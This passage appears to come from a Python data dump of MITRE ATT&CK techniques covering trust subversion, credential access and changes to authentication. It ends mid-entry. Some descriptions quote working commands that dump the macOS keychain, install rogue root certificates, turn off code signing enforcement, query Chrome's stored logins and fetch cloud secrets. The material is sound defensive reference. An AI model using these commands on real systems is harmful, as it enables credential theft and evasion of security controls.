                              'DLL, avoiding the requirement to drop and execute a new file on disk.\n'
                              '* Modifying the <code>DLL</code> and <code>Function</code> Registry values in '
                              '<code>HKLM\\SOFTWARE\\[WOW6432Node\\]Microsoft\\Cryptography\\Providers\\Trust\\FinalPolicy\\{trust '
                              'provider GUID}</code> that point to the DLL providing a trust provider’s FinalPolicy '
                              'function, which is where the decoded and parsed signature is checked and the majority '
                              'of trust decisions are made. Similar to hijacking SIP’s CryptSIPDllVerifyIndirectData '
                              'function, this value can be redirected to a suitable exported function from an already '
                              'present DLL or a maliciously-crafted DLL (though the implementation of a trust provider '
                              'is complex).\n'
                              '* **Note:** The above hijacks are also possible without modifying the Registry via [DLL '
                              'Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).\n'
                              '\n'
                              'Hijacking SIP or trust provider components can also enable persistent code execution, '
                              'since these malicious components may be invoked by any application that performs code '
                              'signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)',
               'name': 'SIP and Trust Provider Hijacking',
               'platforms': ['Windows']},
 'T1553.004': {'attack_id': 'T1553.004',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may install a root certificate on a compromised system to avoid warnings '
                              'when connecting to adversary controlled web servers. Root certificates are used in '
                              'public key cryptography to identify a root certificate authority (CA). When a root '
                              'certificate is installed, the system or application will trust certificates in the '
                              "root's chain of trust that have been signed by the root certificate.(Citation: "
                              'Wikipedia Root Certificate) Certificates are commonly used for establishing secure '
                              'TLS/SSL communications within a web browser. When a user attempts to browse a website '
                              'that presents a certificate that is not trusted an error message will be displayed to '
                              'warn the user of the security risk. Depending on the security settings, the browser may '
                              'not allow the user to establish a connection to the website.\n'
                              '\n'
                              'Installation of a root certificate on a compromised system would give an adversary a '
                              'way to degrade the security of that system. Adversaries have used this technique to '
                              'avoid security warnings prompting users when compromised systems connect over HTTPS to '
                              'adversary controlled web servers that spoof legitimate websites in order to collect '
                              'login credentials.(Citation: Operation Emmental)\n'
                              '\n'
                              'Atypical root certificates have also been pre-installed on systems by the manufacturer '
                              'or in the software supply chain and were used in conjunction with malware/adware to '
                              'provide [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) capability '
                              'for intercepting information transmitted over secure TLS/SSL communications.(Citation: '
                              'Kaspersky Superfish)\n'
                              '\n'
                              'Root certificates (and their associated chains) can also be cloned and reinstalled. '
                              'Cloned certificate chains will carry many of the same metadata characteristics of the '
                              'source and can be used to sign malicious code that may then bypass signature validation '
                              'tools (ex: Sysinternals, antivirus, etc.) used to block execution and/or uncover '
                              'artifacts of Persistence.(Citation: SpectorOps Code Signing Dec 2017)\n'
                              '\n'
                              'In macOS, the Ay MaMi malware uses <code>/usr/bin/security add-trusted-cert -d -r '
                              'trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert</code> to '
                              'install a malicious certificate as a trusted root certificate into the system '
                              'keychain.(Citation: objective-see ay mami 2018)',
               'name': 'Install Root Certificate',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1553.005': {'attack_id': 'T1553.005',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may abuse specific file formats to subvert Mark-of-the-Web (MOTW) controls. '
                              'In Windows, when files are downloaded from the Internet, they are tagged with a hidden '
                              'NTFS Alternate Data Stream (ADS) named <code>Zone.Identifier</code> with a specific '
                              'value known as the MOTW.(Citation: Microsoft Zone.Identifier 2020) Files that are '
                              'tagged with MOTW are protected and cannot perform certain actions. For example, '
                              'starting in MS Office 10, if a MS Office file has the MOTW, it will open in Protected '
                              'View. Executables tagged with the MOTW will be processed by Windows Defender '
                              'SmartScreen that compares files with an allowlist of well-known executables. If the '
                              'file is not known/trusted, SmartScreen will prevent the execution and warn the user not '
                              'to run it.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)(Citation: '
                              'Intezer Russian APT Dec 2020)\n'
                              '\n'
                              'Adversaries may abuse container files such as compressed/archive (.arj, .gzip) and/or '
                              'disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be '
                              'tagged with MOTW. Container files downloaded from the Internet will be marked with MOTW '
                              'but the files within may not inherit the MOTW after the container files are extracted '
                              'and/or mounted. MOTW is a NTFS feature and many container files do not support NTFS '
                              'alternative data streams. After a container file is extracted and/or mounted, the files '
                              'contained within them may be treated as local files on disk and run without '
                              'protections.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)',
               'name': 'Mark-of-the-Web Bypass',
               'platforms': ['Windows']},
 'T1553.006': {'attack_id': 'T1553.006',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may modify code signing policies to enable execution of unsigned or '
                              'self-signed code. Code signing provides a level of authenticity on a program from a '
                              'developer and a guarantee that the program has not been tampered with. Security '
                              'controls can include enforcement mechanisms to ensure that only valid, signed code can '
                              'be run on an operating system. \n'
                              '\n'
                              'Some of these security controls may be enabled by default, such as Driver Signature '
                              'Enforcement (DSE) on Windows or System Integrity Protection (SIP) on macOS.(Citation: '
                              'Microsoft DSE June 2017)(Citation: Apple Disable SIP) Other such controls may be '
                              'disabled by default but are configurable through application controls, such as only '
                              'allowing signed Dynamic-Link Libraries (DLLs) to execute on a system. Since it can be '
                              'useful for developers to modify default signature enforcement policies during the '
                              'development and testing of applications, disabling of these features may be possible '
                              'with elevated permissions.(Citation: Microsoft Unsigned Driver Apr 2017)(Citation: '
                              'Apple Disable SIP)\n'
                              '\n'
                              'Adversaries may modify code signing policies in a number of ways, including through use '
                              'of command-line or GUI utilities, [Modify '
                              'Registry](https://attack.mitre.org/techniques/T1112), rebooting the computer in a '
                              'debug/recovery mode, or by altering the value of variables in kernel memory.(Citation: '
                              'Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP)(Citation: FireEye HIKIT '
                              'Rootkit Part 2)(Citation: GitHub Turla Driver Loader) Examples of commands that can '
                              'modify the code signing policy of a system include <code>bcdedit.exe -set TESTSIGNING '
                              'ON</code> on Windows and <code>csrutil disable</code> on macOS.(Citation: Microsoft '
                              'TESTSIGNING Feb 2021)(Citation: Apple Disable SIP) Depending on the implementation, '
                              'successful modification of a signing policy may require reboot of the compromised '
                              'system. Additionally, some implementations can introduce visible artifacts for the user '
                              '(ex: a watermark in the corner of the screen stating the system is in Test Mode). '
                              'Adversaries may attempt to remove such artifacts.(Citation: F-Secure BlackEnergy 2014)\n'
                              '\n'
                              'To gain access to kernel memory to modify variables related to signature checks, such '
                              'as modifying <code>g_CiOptions</code> to disable Driver Signature Enforcement, '
                              'adversaries may conduct [Exploitation for Privilege '
                              'Escalation](https://attack.mitre.org/techniques/T1068) using a signed, but vulnerable '
                              'driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla Driver Loader)',
               'name': 'Code Signing Policy Modification',
               'platforms': ['Windows', 'macOS']},
 'T1554': {'attack_id': 'T1554',
           'categories': ['persistence'],
           'description': 'Adversaries may modify host software binaries to establish persistent access to systems. '
                          'Software binaries/executables provide a wide range of system commands or services, '
                          'programs, and libraries. Common software binaries are SSH clients, FTP clients, email '
                          'clients, web browsers, and many other user or server applications.\n'
                          '\n'
                          'Adversaries may establish persistence though modifications to host software binaries. For '
                          'example, an adversary may replace or otherwise infect a legitimate application binary (or '
                          'support files) with a backdoor. Since these binaries may be routinely executed by '
                          'applications or the user, the adversary can leverage this for persistent access to the '
                          'host.\n'
                          '\n'
                          'An adversary may also modify an existing binary by patching in malicious functionality '
                          '(e.g., IAT Hooking/Entry point patching)(Citation: Unit42 Banking Trojans Hooking 2022) '
                          'prior to the binary’s legitimate execution. For example, an adversary may modify the entry '
                          'point of a binary to point to malicious code patched in by the adversary before resuming '
                          'normal execution flow.(Citation: ESET FontOnLake Analysis 2021)',
           'name': 'Compromise Host Software Binary',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1555': {'attack_id': 'T1555',
           'categories': ['credential-access'],
           'description': 'Adversaries may search for common password storage locations to obtain user '
                          'credentials.(Citation: F-Secure The Dukes) Passwords are stored in several places on a '
                          'system, depending on the operating system or application holding the credentials. There are '
                          'also specific applications and services that store passwords to make them easier for users '
                          'to manage and maintain, such as password managers and cloud secrets vaults. Once '
                          'credentials are obtained, they can be used to perform lateral movement and access '
                          'restricted information.',
           'name': 'Credentials from Password Stores',
           'platforms': ['Linux', 'macOS', 'Windows', 'IaaS']},
 'T1555.001': {'attack_id': 'T1555.001',
               'categories': ['credential-access'],
               'description': 'Adversaries may acquire credentials from Keychain. Keychain (or Keychain Services) is '
                              'the macOS credential management system that stores account names, passwords, private '
                              'keys, certificates, sensitive application data, payment data, and secure notes. There '
                              'are three types of Keychains: Login Keychain, System Keychain, and Local Items (iCloud) '
                              'Keychain. The default Keychain is the Login Keychain, which stores user passwords and '
                              'information. The System Keychain stores items accessed by the operating system, such as '
                              'items shared among users on a host. The Local Items (iCloud) Keychain is used for items '
                              'synced with Apple’s iCloud service. \n'
                              '\n'
                              'Keychains can be viewed and edited through the Keychain Access application or using the '
                              'command-line utility <code>security</code>. Keychain files are located in '
                              '<code>~/Library/Keychains/</code>, <code>/Library/Keychains/</code>, and '
                              '<code>/Network/Library/Keychains/</code>.(Citation: Keychain Services Apple)(Citation: '
                              'Keychain Decryption Passware)(Citation: OSX Keychain Schaumann)\n'
                              '\n'
                              'Adversaries may gather user credentials from Keychain storage/memory. For example, the '
                              'command <code>security dump-keychain –d</code> will dump all Login Keychain credentials '
                              'from <code>~/Library/Keychains/login.keychain-db</code>. Adversaries may also directly '
                              'read Login Keychain credentials from the '
                              '<code>~/Library/Keychains/login.keychain</code> file. Both methods require a password, '
                              'where the default password for the Login Keychain is the current user’s password to '
                              'login to the macOS host.(Citation: External to DA, the OS X Way)(Citation: Empire '
                              'Keychain Decrypt)  ',
               'name': 'Keychain',
               'platforms': ['macOS']},
 'T1555.002': {'attack_id': 'T1555.002',
               'categories': ['credential-access'],
               'description': 'An adversary with root access may gather credentials by reading `securityd`’s memory. '
                              '`securityd` is a service/daemon responsible for implementing security protocols such as '
                              'encryption and authorization.(Citation: Apple Dev SecurityD) A privileged adversary may '
                              "be able to scan through `securityd`'s memory to find the correct sequence of keys to "
                              'decrypt the user’s logon keychain. This may provide the adversary with various '
                              'plaintext passwords, such as those for users, WiFi, mail, browsers, certificates, '
                              'secure notes, etc.(Citation: OS X Keychain)(Citation: OSX Keydnap malware)\n'
                              '\n'
                              'In OS X prior to El Capitan, users with root access can read plaintext keychain '
                              'passwords of logged-in users because Apple’s keychain implementation allows these '
                              'credentials to be cached so that users are not repeatedly prompted for '
                              'passwords.(Citation: OS X Keychain)(Citation: External to DA, the OS X Way) Apple’s '
                              '`securityd` utility takes the user’s logon password, encrypts it with PBKDF2, and '
                              'stores this master key in memory. Apple also uses a set of keys and algorithms to '
                              'encrypt the user’s password, but once the master key is found, an adversary need only '
                              'iterate over the other values to unlock the final password.(Citation: OS X Keychain)',
               'name': 'Securityd Memory',
               'platforms': ['Linux', 'macOS']},
 'T1555.003': {'attack_id': 'T1555.003',
               'categories': ['credential-access'],
               'description': 'Adversaries may acquire credentials from web browsers by reading files specific to the '
                              'target browser.(Citation: Talos Olympic Destroyer 2018) Web browsers commonly save '
                              'credentials such as website usernames and passwords so that they do not need to be '
                              'entered manually in the future. Web browsers typically store the credentials in an '
                              'encrypted format within a credential store; however, methods exist to extract plaintext '
                              'credentials from web browsers.\n'
                              '\n'
                              'For example, on Windows systems, encrypted credentials may be obtained from Google '
                              'Chrome by reading a database file, <code>AppData\\Local\\Google\\Chrome\\User '
                              'Data\\Default\\Login Data</code> and executing a SQL query: <code>SELECT action_url, '
                              'username_value, password_value FROM logins;</code>. The plaintext password can then be '
                              'obtained by passing the encrypted credentials to the Windows API function '
                              '<code>CryptUnprotectData</code>, which uses the victim’s cached logon credentials as '
                              'the decryption key.(Citation: Microsoft CryptUnprotectData April 2018)\n'
                              ' \n'
                              'Adversaries have executed similar procedures for common web browsers such as FireFox, '
                              'Safari, Edge, etc.(Citation: Proofpoint Vega Credential Stealer May 2018)(Citation: '
                              'FireEye HawkEye Malware July 2017) Windows stores Internet Explorer and Microsoft Edge '
                              'credentials in Credential Lockers managed by the [Windows Credential '
                              'Manager](https://attack.mitre.org/techniques/T1555/004).\n'
                              '\n'
                              'Adversaries may also acquire credentials by searching web browser process memory for '
                              'patterns that commonly match credentials.(Citation: GitHub Mimikittenz July 2016)\n'
                              '\n'
                              'After acquiring credentials from web browsers, adversaries may attempt to recycle the '
                              'credentials across different systems and/or accounts in order to expand access. This '
                              "can result in significantly furthering an adversary's objective in cases where "
                              'credentials gained from web browsers overlap with privileged accounts (e.g. domain '
                              'administrator).',
               'name': 'Credentials from Web Browsers',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1555.004': {'attack_id': 'T1555.004',
               'categories': ['credential-access'],
               'description': 'Adversaries may acquire credentials from the Windows Credential Manager. The Credential '
                              'Manager stores credentials for signing into websites, applications, and/or devices that '
                              'request authentication through NTLM or Kerberos in Credential Lockers (previously known '
                              'as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft '
                              'Credential Locker)\n'
                              '\n'
                              'The Windows Credential Manager separates website credentials from application or '
                              'network credentials in two lockers. As part of [Credentials from Web '
                              'Browsers](https://attack.mitre.org/techniques/T1555/003), Internet Explorer and '
                              'Microsoft Edge website credentials are managed by the Credential Manager and are stored '
                              'in the Web Credentials locker. Application and network credentials are stored in the '
                              'Windows Credentials locker.\n'
                              '\n'
                              'Credential Lockers store credentials in encrypted `.vcrd` files, located under '
                              '`%Systemdrive%\\Users\\\\[Username]\\AppData\\Local\\Microsoft\\\\[Vault/Credentials]\\`. '
                              'The encryption key can be found in a file named <code>Policy.vpol</code>, typically '
                              'located in the same folder as the credentials.(Citation: passcape Windows '
                              'Vault)(Citation: Malwarebytes The Windows Vault)\n'
                              '\n'
                              'Adversaries may list credentials managed by the Windows Credential Manager through '
                              'several mechanisms. <code>vaultcmd.exe</code> is a native Windows executable that can '
                              'be used to enumerate credentials stored in the Credential Locker through a command-line '
                              'interface. Adversaries may also gather credentials by directly reading files located '
                              'inside of the Credential Lockers. Windows APIs, such as <code>CredEnumerateA</code>, '
                              'may also be absued to list credentials managed by the Credential Manager.(Citation: '
                              'Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)\n'
                              '\n'
                              'Adversaries may also obtain credentials from credential backups. Credential backups and '
                              'restorations may be performed by running <code>rundll32.exe keymgr.dll '
                              'KRShowKeyMgr</code> then selecting the “Back up...” button on the “Stored User Names '
                              'and Passwords” GUI.\n'
                              '\n'
                              'Password recovery tools may also obtain plain text passwords from the Credential '
                              'Manager.(Citation: Malwarebytes The Windows Vault)',
               'name': 'Windows Credential Manager',
               'platforms': ['Windows']},
 'T1555.005': {'attack_id': 'T1555.005',
               'categories': ['credential-access'],
               'description': 'Adversaries may acquire user credentials from third-party password managers.(Citation: '
                              'ise Password Manager February 2019) Password managers are applications designed to '
                              'store user credentials, normally in an encrypted database. Credentials are typically '
                              'accessible after a user provides a master password that unlocks the database. After the '
                              'database is unlocked, these credentials may be copied to memory. These databases can be '
                              'stored as files on disk.(Citation: ise Password Manager February 2019)\n'
                              '\n'
                              'Adversaries may acquire user credentials from password managers by extracting the '
                              'master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao '
                              'December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from '
                              'memory via [Exploitation for Credential '
                              'Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)\n'
                              ' Adversaries may also try brute forcing via [Password '
                              'Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password '
                              'of a password manager.(Citation: Cyberreason Anchor December 2019)',
               'name': 'Password Managers',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1555.006': {'attack_id': 'T1555.006',
               'categories': ['credential-access'],
               'description': 'Adversaries may acquire credentials from cloud-native secret management solutions such '
                              'as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault, and Terraform Vault.  \n'
                              '\n'
                              'Secrets managers support the secure centralized management of passwords, API keys, and '
                              'other credential material. Where secrets managers are in use, cloud services can '
                              'dynamically acquire credentials via API requests rather than accessing secrets '
                              'insecurely stored in plain text files or environment variables.  \n'
                              '\n'
                              'If an adversary is able to gain sufficient privileges in a cloud environment – for '
                              'example, by obtaining the credentials of high-privileged [Cloud '
                              'Accounts](https://attack.mitre.org/techniques/T1078/004) or compromising a service that '
                              'has permission to retrieve secrets – they may be able to request secrets from the '
                              'secrets manager. This can be accomplished via commands such as `get-secret-value` in '
                              'AWS, `gcloud secrets describe` in GCP, and `az key vault secret show` in '
                              'Azure.(Citation: Permiso Scattered Spider 2023)(Citation: Sysdig ScarletEel 2.0 '
                              '2023)(Citation: AWS Secrets Manager)(Citation: Google Cloud Secrets)(Citation: '
                              'Microsoft Azure Key Vault)\n'
                              '\n'
                              '**Note:** this technique is distinct from [Cloud Instance Metadata '
                              'API](https://attack.mitre.org/techniques/T1552/005) in that the credentials are being '
                              'directly requested from the cloud secrets manager, rather than through the medium of '
                              'the instance metadata API.',
               'name': 'Cloud Secrets Management Stores',
               'platforms': ['IaaS']},
 'T1556': {'attack_id': 'T1556',
           'categories': ['credential-access', 'defense-evasion', 'persistence'],
           'description': 'Adversaries may modify authentication mechanisms and processes to access user credentials '
                          'or enable otherwise unwarranted access to accounts. The authentication process is handled '
                          'by mechanisms, such as the Local Security Authentication Server (LSASS) process and the '
                          'Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on '
                          'Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, '
                          'storing, and validating credentials. By modifying an authentication process, an adversary '
                          'may be able to authenticate to a service or system without using [Valid '
                          'Accounts](https://attack.mitre.org/techniques/T1078).\n'
                          '\n'
                          'Adversaries may maliciously modify a part of this process to either reveal credentials or '
                          'bypass authentication mechanisms. Compromised credentials or access may be used to bypass '
                          'access controls placed on various resources on systems within the network and may even be '
                          'used for persistent access to remote systems and externally available services, such as '
                          'VPNs, Outlook Web Access and remote desktop.',
           'name': 'Modify Authentication Process',
           'platforms': ['Windows',
                         'Linux',
                         'macOS',
                         'Network',
                         'Azure AD',
                         'Google Workspace',
                         'IaaS',
                         'Office 365',
                         'SaaS']},
 'T1556.001': {'attack_id': 'T1556.001',
               'categories': ['credential-access', 'defense-evasion', 'persistence'],
               'description': 'Adversaries may patch the authentication process on a domain controller to bypass the '
                              'typical authentication mechanisms and enable access to accounts. \n'
                              '\n'
                              'Malware may be used to inject false credentials into the authentication process on a '
                              'domain controller with the intent of creating a backdoor used to access any user’s '
                              'account and/or credentials (ex: [Skeleton '
                              'Key](https://attack.mitre.org/software/S0007)). Skeleton key works through a patch on '
                              'an enterprise domain controller authentication process (LSASS) with credentials that '
                              'adversaries may use to bypass the standard authentication system. Once patched, an '
                              'adversary can use the injected password to successfully authenticate as any domain user '
                              'account (until the the skeleton key is erased from memory by a reboot of the domain '
                              'controller). Authenticated access may enable unfettered access to hosts and/or '
                              'resources within single-factor authentication environments.(Citation: Dell Skeleton)',
               'name': 'Domain Controller Authentication',
               'platforms': ['Windows']},
 'T1556.002': {'attack_id': 'T1556.002',
               'categories': ['credential-access', 'defense-evasion', 'persistence'],
               'description': 'Adversaries may register malicious password filter dynamic link libraries (DLLs) into '
                              'the authentication process to acquire user credentials as they are validated. \n'
                              '\n'
                              'Windows password filters are password policy enforcement mechanisms for both domain and '
                              'local accounts. Filters are implemented as DLLs containing a method to validate '
                              'potential passwords against password policies. Filter DLLs can be positioned on local '
                              'computers for local accounts and/or domain controllers for domain accounts. Before '
                              'registering new passwords in the Security Accounts Manager (SAM), the Local Security '
                              'Authority (LSA) requests validation from each registered filter. Any potential changes '
                              'cannot take effect until every registered filter acknowledges validation. \n'
                              '\n'
                              'Adversaries can register malicious password filters to harvest credentials from local '
                              'computers and/or entire domains. To perform proper validation, filters must receive '
                              'plain-text credentials from the LSA. A malicious password filter would receive these '
                              'plain-text credentials every time a password request is made.(Citation: Carnal Ownage '
                              'Password Filters Sept 2013)',
               'name': 'Password Filter DLL',
               'platforms': ['Windows']},
 'T1556.003': {'attack_id': 'T1556.003',
               'categories': ['credential-access', 'defense-evasion', 'persistence'],
               'description': 'Adversaries may modify pluggable authentication modules (PAM) to access user '
                              'credentials or enable otherwise unwarranted access to accounts. PAM is a modular system '
                              'of configuration files, libraries, and executable files which guide authentication for '
                              'many services. The most common authentication module is <code>pam_unix.so</code>, which '
                              'retrieves, sets, and verifies account authentication information in '
                              '<code>/etc/passwd</code> and <code>/etc/shadow</code>.(Citation: Apple PAM)(Citation: '
                              'Man Pam_Unix)(Citation: Red Hat PAM)\n'
                              '\n'
                              'Adversaries may modify components of the PAM system to create backdoors. PAM '
                              'components, such as <code>pam_unix.so</code>, can be patched to ac